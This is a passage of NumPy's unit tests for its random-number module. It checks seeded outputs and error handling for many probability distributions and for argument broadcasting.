np.random.seed(self.seed)
actual = np.random.random_sample((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_choice_uniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False,
p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
np.random.seed(self.seed)
actual = np.random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = np.random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(np.random.choice(2, replace=True)))
assert_(np.isscalar(np.random.choice(2, replace=False)))
assert_(np.isscalar(np.random.choice(2, replace=True, p=p)))
assert_(np.isscalar(np.random.choice(2, replace=False, p=p)))
assert_(np.isscalar(np.random.choice([1, 2], replace=True)))
assert_(np.random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(np.random.choice(2, s, replace=True)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False)))
assert_(not np.isscalar(np.random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(np.random.choice([1, 2], s, replace=True)))
assert_(np.random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(np.random.choice(6, s, replace=True).shape, s)
assert_equal(np.random.choice(6, s, replace=False).shape, s)
assert_equal(np.random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(np.random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(np.random.choice(np.arange(6), s, replace=True).shape, s)
def test_bytes(self):
np.random.seed(self.seed)
actual = np.random.bytes(10)
desired = b'\x82Ui\x9e\xff\x97+Wf\xa5'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, 1),
("b", np.int32, 1)])]:
np.random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
np.random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
np.random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
np.random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_beta(self):
np.random.seed(self.seed)
actual = np.random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
np.random.seed(self.seed)
actual = np.random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
assert_array_equal(actual, desired)
def test_chisquare(self):
np.random.seed(self.seed)
actual = np.random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
np.random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = np.random.mtrand.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, np.random.dirichlet, p, np.float(1))
def test_exponential(self):
np.random.seed(self.seed)
actual = np.random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(np.random.exponential(scale=0), 0)
assert_raises(ValueError, np.random.exponential, scale=-0.)
def test_f(self):
np.random.seed(self.seed)
actual = np.random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
np.random.seed(self.seed)
actual = np.random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(np.random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, np.random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
np.random.seed(self.seed)
actual = np.random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
assert_array_equal(actual, desired)
def test_gumbel(self):
np.random.seed(self.seed)
actual = np.random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(np.random.gumbel(scale=0), 0)
assert_raises(ValueError, np.random.gumbel, scale=-0.)
def test_hypergeometric(self):
np.random.seed(self.seed)
actual = np.random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = np.random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = np.random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
np.random.seed(self.seed)
actual = np.random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(np.random.laplace(scale=0), 0)
assert_raises(ValueError, np.random.laplace, scale=-0.)
def test_logistic(self):
np.random.seed(self.seed)
actual = np.random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
np.random.seed(self.seed)
actual = np.random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(np.random.lognormal(sigma=0), 1)
assert_raises(ValueError, np.random.lognormal, sigma=-0.)
def test_logseries(self):
np.random.seed(self.seed)
actual = np.random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
assert_array_equal(actual, desired)
def test_multinomial(self):
np.random.seed(self.seed)
actual = np.random.multinomial(20, [1/6.]*6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
np.random.seed(self.seed)
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = np.random.multivariate_normal(mean, cov, size)
desired = np.array([[[1.463620246718631, 11.73759122771936 ],
[1.622445133300628, 9.771356667546383]],
[[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306]],
[[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = np.random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, np.random.multivariate_normal, mean, cov)
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(np.random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, np.random.multivariate_normal, mean, cov,
check_valid='raise')
def test_negative_binomial(self):
np.random.seed(self.seed)
actual = np.random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
assert_array_equal(actual, desired)
def test_noncentral_chisquare(self):
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = np.random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125]])
assert_array_almost_equal(actual, desired, decimal=14)
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
np.random.seed(self.seed)
actual = np.random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
np.random.seed(self.seed)
actual = np.random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(np.random.normal(scale=0), 0)
assert_raises(ValueError, np.random.normal, scale=-0.)
def test_pareto(self):
np.random.seed(self.seed)
actual = np.random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# http://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
np.random.seed(self.seed)
actual = np.random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, np.random.poisson, lamneg)
assert_raises(ValueError, np.random.poisson, [lamneg]*10)
assert_raises(ValueError, np.random.poisson, lambig)
assert_raises(ValueError, np.random.poisson, [lambig]*10)
def test_power(self):
np.random.seed(self.seed)
actual = np.random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
np.random.seed(self.seed)
actual = np.random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(np.random.rayleigh(scale=0), 0)
assert_raises(ValueError, np.random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
np.random.seed(self.seed)
actual = np.random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
np.random.seed(self.seed)
actual = np.random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
np.random.seed(self.seed)
actual = np.random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(np.random.standard_gamma(shape=0), 0)
assert_raises(ValueError, np.random.standard_gamma, shape=-0.)
def test_standard_normal(self):
np.random.seed(self.seed)
actual = np.random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
np.random.seed(self.seed)
actual = np.random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
np.random.seed(self.seed)
actual = np.random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
np.random.seed(self.seed)
actual = np.random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = np.random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
np.random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, np.random.uniform, throwing_float, throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, np.random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
np.random.seed(self.seed)
actual = np.random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
np.random.seed(self.seed)
r = np.random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
np.testing.assert_(np.isfinite(r).all())
def test_wald(self):
np.random.seed(self.seed)
actual = np.random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
np.random.seed(self.seed)
actual = np.random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
assert_equal(np.random.weibull(a=0), 0)
assert_raises(ValueError, np.random.weibull, a=-0.)
def test_zipf(self):
np.random.seed(self.seed)
actual = np.random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
assert_array_equal(actual, desired)
class TestBroadcast(TestCase):
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setUp(self):
self.seed = 123456789
def setSeed(self):
np.random.seed(self.seed)
# TODO: Include test for randint once it can broadcast
# Can steal the test written in PR #6938
def test_uniform(self):
low = [0]
high = [1]
uniform = np.random.uniform
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.setSeed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = np.random.normal
desired = np.array([2.2129019979039612,
2.1283977976520019,
1.8417114045748335])
self.setSeed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.setSeed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = np.random.beta
desired = np.array([0.19843558305989056,
0.075230336409423643,
0.24976865978980844])
self.setSeed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.setSeed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = np.random.exponential
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = np.random.standard_gamma
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = np.random.gamma
desired = np.array([1.5221370731769048,
1.5277256455738331,
1.4248762625178359])
self.setSeed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.setSeed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = np.random.f
desired = np.array([0.80038951638264799,
0.86768719635363512,
2.7251095168386801])
self.setSeed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.setSeed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = np.random.noncentral_f
desired = np.array([9.1393943263705211,
13.025456344595602,
8.8018098359100545])
self.setSeed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = np.random.chisquare
desired = np.array([0.57022801133088286,
0.51947702108840776,
0.1320969254923558])
self.setSeed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = np.random.noncentral_chisquare
desired = np.array([9.0015599467913763,
4.5804135049718742,
6.0872302432834564])
self.setSeed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.setSeed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = np.random.standard_t
desired = np.array([3.0702872575217643,
5.8560725167361607,
1.0274791436474273])
self.setSeed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = np.random.vonmises
desired = np.array([2.9883443664201312,
-2.7064099483995943,
-1.8672476700665914])
self.setSeed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.setSeed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = np.random.pareto
desired = np.array([1.1405622680198362,
1.1465519762044529,
1.0389564467453547])
self.setSeed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = np.random.weibull
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = np.random.power
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = np.random.laplace
desired = np.array([0.067921356028507157,
0.070715642226971326,
0.019290950698972624])
self.setSeed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.setSeed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = np.random.gumbel
desired = np.array([0.2730318639556768,
0.26936705726291116,
0.33906220393037939])
self.setSeed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.setSeed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = np.random.logistic
desired = np.array([0.13152135837586171,
0.13675915696285773,
0.038216792802833396])
self.setSeed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.setSeed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = np.random.lognormal
desired = np.array([9.1422086044848427,
8.4013952870126261,
6.3073234116578671])
self.setSeed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
self.setSeed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = np.random.rayleigh
desired = np.array([1.2337491937897689,
1.2360119924878694,
1.1936818095781789])
self.setSeed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
